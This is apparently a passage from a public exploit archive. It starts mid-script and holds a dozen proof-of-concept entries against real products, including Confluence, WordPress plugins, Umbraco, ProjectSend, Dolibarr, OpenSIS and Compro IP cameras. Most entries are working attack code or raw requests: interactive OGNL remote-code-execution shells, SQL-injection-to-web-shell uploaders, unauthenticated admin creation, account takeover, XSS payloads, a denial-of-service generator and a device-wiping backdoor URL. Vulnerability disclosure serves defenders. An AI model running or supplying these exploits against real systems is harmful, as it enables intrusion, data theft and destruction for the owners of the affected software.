{jwt}\n\n") def code_exec(cmd): global jwt, url print("[+] Triggering Remote code executin\n[*] Rember this is a blind RCE don't expect to see output") headers = {"Authorization" : f"Bearer {jwt}"} data = {"plugin" : f"documentation && $({cmd})", "port" : "1337"} out = requests.post(f"{url}/admin/plugins/install", json = data, headers = headers) print(out.text) if __name__ == ("__main__"): url = sys.argv[1] if url.endswith("/"): url = url[:-1] check_version() password_reset() terminal = Terminal() terminal.cmdloop()

# Exploit Title: Projectsend r1295 - 'name' Stored XSS # Date: 30.08.2021 # Exploit Author: Abdullah Kala # Vendor Homepage: https://www.projectsend.org/ # Software Link: https://www.projectsend.org/download/387/ # Version: r1295 # Tested on: Ubuntu 18.04 # Description: Firstly add client group. After uploading the file from the user with any role, payload is written in the "title" part of the redirected page, add group your created and save. For users with the "System Administrator" role, xss is triggered on the "Dashboard" page. POST /projectsend/files-edit.php?ids=1 HTTP/1.1 Host: 10.10.10.55 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------36890316955266305672634658708 Content-Length: 1323 Origin: http://10.10.10.55 Connection: close Referer: http://10.10.10.55/projectsend/files-edit.php?ids=5 Cookie: menu_contracted=false; PHPSESSID=kvip7m24ib2d062hcaut3fbr2o Upgrade-Insecure-Requests: 1 -----------------------------36890316955266305672634658708 Content-Disposition: form-data; name="csrf_token" f53a148f0f952cb00c7e7edc63be5a3efd911d5c27de15eb78c7323a6d7b3c02 -----------------------------36890316955266305672634658708 Content-Disposition: form-data; name="file[1][id]" 1 -----------------------------36890316955266305672634658708 Content-Disposition: form-data; name="file[1][original]" test.png -----------------------------36890316955266305672634658708 Content-Disposition: form-data; name="file[1][file]" 1630247451-f2d3f09150beb76c7f2c83dc27732a0b23718875-kudur.png -----------------------------36890316955266305672634658708 Content-Disposition: form-data; name="file[1][name]" <script>alert(1)</script> -----------------------------36890316955266305672634658708 Content-Disposition: form-data; name="file[1][description]" test -----------------------------36890316955266305672634658708 Content-Disposition: form-data; name="file[1][expiry_date]" 28-09-2021 -----------------------------36890316955266305672634658708 Content-Disposition: form-data; name="file[1][assignments][groups][]" 1 -----------------------------36890316955266305672634658708 Content-Disposition: form-data; name="save" -----------------------------36890316955266305672634658708--

# Exploit Title: Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated) # Exploit Author: BitTheByte # Description: Authenticated path traversal vulnerability. # Exploit Research: https://www.tenable.com/security/research/tra-2020-59 # Vendor Homepage: https://umbraco.com/ # Version: <= 8.9.1 # CVE : CVE-2020-5811 import string import random import argparse import zipfile import os package_xml = f"""<?xml version="1.0" encoding="utf-8"?> <umbPackage> <files> <file> <guid>{{filename}}</guid> <orgPath>{{upload_path}}</orgPath> <orgName>{{filename}}</orgName> </file> </files> <info> <package> <name>PoC-{''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))}</name> <version>1.0.0</version> <iconUrl></iconUrl> <license url="http://opensource.org/licenses/MIT">MIT License</license> <url>https://example.com</url> <requirements> <major>0</major> <minor>0</minor> <patch>0</patch> </requirements> </package> <author> <name>CVE-2020-5811</name> <website>https://example.com</website> </author> <contributors> <contributor></contributor> </contributors> <readme><![CDATA[]]></readme> </info> <DocumentTypes /> <Templates /> <Stylesheets /> <Macros /> <DictionaryItems /> <Languages /> <DataTypes /> <Actions /> </umbPackage> """ parser = argparse.ArgumentParser(description='CVE-2020-5811') parser.add_argument('--shell', type=str, help='Shell file to upload', required=True) parser.add_argument('--upload-path', type=str, help='Shell file update path on target server (default=~/../scripts)', default='~/../scripts') args = parser.parse_args() if not os.path.isfile(args.shell): print("[ERROR] please use a correct path for the shell file.") output_file = "exploit.zip" package = zipfile.ZipFile(output_file, 'w') package.writestr('package.xml', package_xml.format(filename=os.path.basename(args.shell), upload_path=args.upload_path)) package.writestr(os.path.basename(args.shell), open(args.shell, 'r').read()) package.close() print(f"[DONE] Created Umbraco package: {output_file}")

# Exploit Title: WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated) # Date: 23-08-2021 # Exploit Author: Numan Rajkotiya # Vendor Homepage: https://profilepress.net/ # Software Link: https://downloads.wordpress.org/plugin/wp-user-avatar.3.0.zip # Version: [1] ProfilePress (Formerly WP User Avatar) 3.0 - 3.13 [2] WordPress 4.7 or higher # Tested on: ProfilePress 3.0, Apache 2.4, and Windows Build 19043.928 # CVE : CVE-2021-34621 #!/bin/bash # Exploit for WordPress Plugin ProfilePress 3.0 - 3.1.3 # Change the name and password as per your requirement. URL=$1 curl -X POST $URL"/wp-admin/admin-ajax.php" \ -H "Content-Type: application/x-www-form-urlencoded" \ -d "reg_username=numan" \ -d "[email protected]" \ -d "reg_password=numan" \ -d "reg_password_present=true" \ -d "wp_capabilities[administrator]=1" \ -d "reg_first_name=pwned" \ -d "reg_last_name=numan" \ -d "action=pp_ajax_signup"

# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated) # Date: 01/09/2021 # Exploit Author: h3v0x # Vendor Homepage: https://www.atlassian.com/ # Software Link: https://www.atlassian.com/software/confluence/download-archives # Version: All < 7.12.x versions before 7.12.5 # Tested on: Linux Distros # CVE : CVE-2021-26084 #!/usr/bin/python3 # References: # https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html # https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md import requests from bs4 import BeautifulSoup import optparse parser = optparse.OptionParser() parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://confluencexxx.com") parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x") options, args = parser.parse_args() session = requests.Session() url_vuln = options.url endpoint = options.path if not options.url or not options.path: print('[+] Specify an url target') print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x') print('[+] Example help usage: exploit.py -h') exit() def banner(): print('---------------------------------------------------------------') print('[-] Confluence Server Webwork OGNL injection') print('[-] CVE-2021-26084') print('[-] https://github.com/h3v0x') print('--------------------------------------------------------------- \n') def cmdExec(): while True: cmd = input('> ') xpl_url = url_vuln + endpoint xpl_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded", "Accept-Encoding": "gzip, deflate"} xpl_data = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"} rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data) soup = BeautifulSoup(rawHTML.text, 'html.parser') queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value'] print(queryStringValue) banner() cmdExec()

# Exploit Title: Traffic Offense Management System 1.0 - SQLi to Remote Code Execution (RCE) (Unauthenticated) # Date: 19.08.2021 # Exploit Author: Tagoletta (Tağmaç) # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html # Version: 1.0 # Tested on: Linux import requests import random import string import json from bs4 import BeautifulSoup url = input("TARGET = ") if not url.startswith('http://') and not url.startswith('https://'): url = "http://" + url if not url.endswith('/'): url = url + "/" payload= "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>" let = string.ascii_lowercase shellname = ''.join(random.choice(let) for i in range(15)) session = requests.session() print("Login Bypass\n") request_url = url + "/classes/Login.php?f=login" post_data = {"username": "admin' or '1'='1'#", "password": ""} bypassUser = session.post(request_url, data=post_data) data = json.loads(bypassUser.text) status = data["status"] if status == "success": print("Finding first driver\n") getHTML = session.get(url + "admin/?page=drivers") getHTMLParser = BeautifulSoup(getHTML.text, 'html.parser') findFirstDriverID = getHTMLParser.find("a", {"class": "delete_data"}).get("data-id") print("Found firs driver ID : " + findFirstDriverID) print("\nFinding path") findPath = session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+'\'') findPath = findPath.text[findPath.text.index("<b>Warning</b>: ")+17:findPath.text.index("</b> on line ")] findPath = findPath[findPath.index("<b>")+3:len(findPath)] parser = findPath.split('\\') parser.pop() findPath = "" for find in parser: findPath += find + "/" print("\nFound Path : " + findPath) shellPath = findPath[findPath.index("admin/"):len(findPath)] SQLtoRCE = "' LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -" SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php") SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex()) print("\n\nShell Uploading...") session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+SQLtoRCE) print("\nShell Path : " + url+shellPath+shellname+".php") shellOutput = session.get(url+shellPath+shellname+".php?tago=whoami") print("\n\nShell Output : "+shellOutput.text) else: print("No bypass user")

# Exploit Title: WordPress Plugin Payments Plugin | GetPaid 2.4.6 - HTML Injection # Date: 29/08/2021 # Exploit Author: Niraj Mahajan # Software Link: https://wordpress.org/plugins/invoicing/ # Version: 2.4.6 # Tested on Windows *Steps to Reproduce:* 1. Install Wordpress 5.8 2. Install and Activate "WordPress Payments Plugin | GetPaid" Version 2.4.6 3. Navigate to GetPaid > Payment Forms 4. Click on "Add New" in the Payment Form page 5. Add a title and Click on Billing Email 6. You can see the "Help Text" field on the left hand side. 7. Add the below HTML code into the "Help Text" Field. <img src=" https://www.pandasecurity.com/en/mediacenter/src/uploads/2019/07/pandasecurity-How-do-hackers-pick-their-targets.jpg" height="200px" width="200px"> 8. You will observe that the HTML code has successfully got stored into the database and executed successfully and we are getting an Image at the right hand side.

# Exploit Title: Telegram Desktop 2.9.2 - Denial of Service (PoC) # Exploit Author: Aryan Chehreghani # Date: 2021-08-30 # Vendor Homepage: https://telegram.org # Software Link: https://telegram.org/dl/desktop/win64 # Tested Version: 2.9.2 x64 # Tested on OS: Windows 10 Enterprise # [ About App ] #Telegram is a messaging app with a focus on speed and security, it’s super-fast, simple and free, #You can use Telegram on all your devices at the same time — your messages sync seamlessly across any number of your phones, tablets or computers. #Telegram has over 500 million monthly active users and is one of the 10 most downloaded apps in the world. #With Telegram, you can send messages, photos, videos and files of any type (doc, zip, mp3, etc), as well as create groups for up to 200,000 people or channels for broadcasting to unlimited audiences. #You can write to your phone contacts and find people by their usernames. As a result, #Telegram is like SMS and email combined — and can take care of all your personal or business messaging needs, #Telegram is support end-to-end encrypted voice and video calls, as well as voice chats in groups for thousands of participants. # [ POC ] # 1.Run the python script, it will create a new file "output.txt" # 2.Run Telegram Desktop and go to "Saved Messages" # 3.Copy the content of the file "output.txt" # 4.Paste the content of dos.txt into the "Write a message..." # 5.Crashed ;) #!/usr/bin/env python buffer = "\x41" * 9000000 try: f=open("output.txt","w") print("[!] Creating %s bytes DOS payload...." %len(buffer)) f.write(buffer) f.close() print("[!] File Created !") except: print("File cannot be created")

# Exploit Title: Dolibarr ERP/CRM 14.0.1 - Privilege Escalation # Date: April 8, 2021 # Exploit Author: Vishwaraj101 # Vendor Homepage: https://www.dolibarr.org/ # Affected Version: <= 14.0.1 # Patch: https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d *Summary:* Using the below chain of issues attacker can compromise any dolibarr user account including the admin. *Poc:* 1. Visit https://example.com/api/index.php/login?login=demo&password=demo try to login with a test user with 0 permissons or less permissions. 2. We will receive an api token in return. 3. Next we need to fetch the user id of the user whose account we want to own. *First we need to fetch the user id of the admin user using the below api.* *Request1:* GET /api/index.php/users/login/admin HTTP/1.1Host: preview2.dolibarr.ohttps://preview2.dolibarr.org/api/index.php/users/login/adminrg User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@tqn9xk6rn6fq8x9ijbmpouosrjxan3srh.burpcollaborator.netAccept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflateDOLAPIKEY: test1337Connection: close *This will return the user details using the username. Now update the victim user account via below api (include the json body received from the previous request1 and replace the email id from below json to the attacker controlled email)* *Request2:*PUT /api/index.php/users/*12* HTTP/1.1 Host: preview2.dolibarr.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@67bmexn44jw3paqv0o3257558wen5mwal.burpcollaborator.netAccept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDOLAPIKEY: test1337Origin: https://preview2.dolibarr.orgConnection: closeReferer: http://5z5l6wf3wio2h9iusnv1x6x40v6mxkw8l.burpcollaborator.net/refContent-Length: 3221 { "id": "12", "statut": "1", "employee": "1", "civility_code": null, "gender": "woman", "birth": 495583200, "email": "*[email protected] <[email protected]>*", "personal_email": "", "socialnetworks": { "facebook": "", "skype": "", "twitter": "", "linkedin": "", "instagram": "", "snapchat": "", "googleplus": "", "youtube": "", "whatsapp": "", "tumblr": "", "vero": "", "viadeo": "", "slack": "", "xing": "", "meetup": "", "pinterest": "", "flickr": "", "500px": "", "giphy": "", "gifycat": "", "dailymotion": "", "vimeo": "", "periscope": "", "twitch": "", "discord": "", "wikipedia": "", "reddit": "", "quora": "", "tripadvisor": "", "mastodon": "", "diaspora": "", "viber": "" }, "job": "Admin Technical", "signature": "", "address": "", "zip": "", "town": "", "state_id": null, "state_code": null, "state": null, "office_phone": "", "office_fax": "", "user_mobile": "", "personal_mobile": "", "admin": "1", "login": "admin", "entity": "0", "datec": 1507187386, "datem": 1617819214, "socid": null, "contact_id": null, "fk_member": null, "fk_user": "11", "fk_user_expense_validator": null, "fk_user_holiday_validator": null, "clicktodial_url": null, "clicktodial_login": null, "clicktodial_poste": null, "datelastlogin": 1617816891, "datepreviouslogin": 1617815935, "datestartvalidity": "", "dateendvalidity": "", "photo": "com.jpg", "lang": "fr_FR", "rights": { "user": { "user": {}, "self": {} } }, "conf": {}, "users": [], "parentof": null, "accountancy_code": "", "weeklyhours": "39.00000000", "color": "", "dateemployment": "", "dateemploymentend": "", "default_c_exp_tax_cat": null, "default_range": null, "fk_warehouse": null, "import_key": null, "array_options": [], "array_languages": null, "linkedObjectsIds": null, "canvas": null, "fk_project": null, "contact": null, "thirdparty": null, "user": null, "origin": null, "origin_id": null, "ref": "12", "ref_ext": null, "status": null, "country": null, "country_id": null, "country_code": "", "region_id": null, "barcode_type": null, "barcode_type_code": null, "barcode_type_label": null, "barcode_type_coder": null, "mode_reglement_id": null, "cond_reglement_id": null, "demand_reason_id": null, "transport_mode_id": null, "cond_reglement": null, "modelpdf": null, "last_main_doc": null, "fk_bank": null, "fk_account": null, "note_public": "", "note_private": "", "note": "", "name": null, "lastname": "Adminson", "firstname": "Alice", "civility_id": null, "date_creation": null, "date_validation": null, "date_modification": null, "specimen": 0, "alreadypaid": null, "liste_limit": 0 } This will reset the admin email account to the attacker controlled email account, now using the password reset feature attacker will reset the admin account password and will gain access to the admin account.

# Exploit Title: OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection # Date: 09/01/2021 # Exploit Author: Eric Salario # Vendor Homepage: http://www.os4ed.com/ # Software Link: https://opensis.com/download # Version: 8.0 # Tested on: Windows, Linux A SQL injection vulnerability exists in the Take Attendance functionality of OS4Ed's OpenSIS 8.0. allows an attacker to inject their own SQL query. The cp_id_miss_attn parameter from TakeAttendance.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request as a user with access to "Take Attendance" functionality to trigger this vulnerability. Steps to reproduce: 1. Login as "Teacher" and navigate to "Attendance" then "Take Attendance". Capture the request on a web proxy such as BurpSuite Or just navigate to the URL: http://localhost/Ajax.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=27&cpv_id_miss_attn=23&ajax=true Vulnerable parameter: cp_id_miss_attn SQLi payload: r AND (SELECT 1670 FROM (SELECT(SLEEP(10)))VSpq) URL with the payload: http://localhost/Ajax.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=r AND (SELECT 1670 FROM (SELECT(SLEEP(10)))VSpq)&cpv_id_miss_attn=23&ajax=true 2. The page should load depends on the sleep You can use manual queries to dump database information or use sqlmap. PoC: https://youtu.be/GGHiPvdPRas

# Exploit Title: Compro Technology IP Camera - 'killps.cgi' Denial-of-Service (DoS) # Date: 2021-09-30 # Exploit Author: icekam,xiao13,Rainbow,tfsec # Software Link: http://www.comprotech.com.hk/ # Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 # CVE : CVE-2021-40378 There is a backdoor prefabricated in the device in this path. Accessing the file through the browser after logging in will cause the device to delete all data (including the data of the camera itself). Payload:Visit this page after logging in /cgi-bin/support/killps.cgi please refer to: https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md

# Exploit Title: Compro Technology IP Camera - RTSP stream disclosure (Unauthenticated) # Date: 2021-09-30 # Exploit Author: icekam,xiao13,Rainbow,tfsec # Software Link: http://www.comprotech.com.hk/ # Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 # CVE : CVE-2021-40379 Some devices have unauthorized access to rstp, which can lead to the leakage of surveillance video stream information. Payload:rstp://.../medias2 please refer to: https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md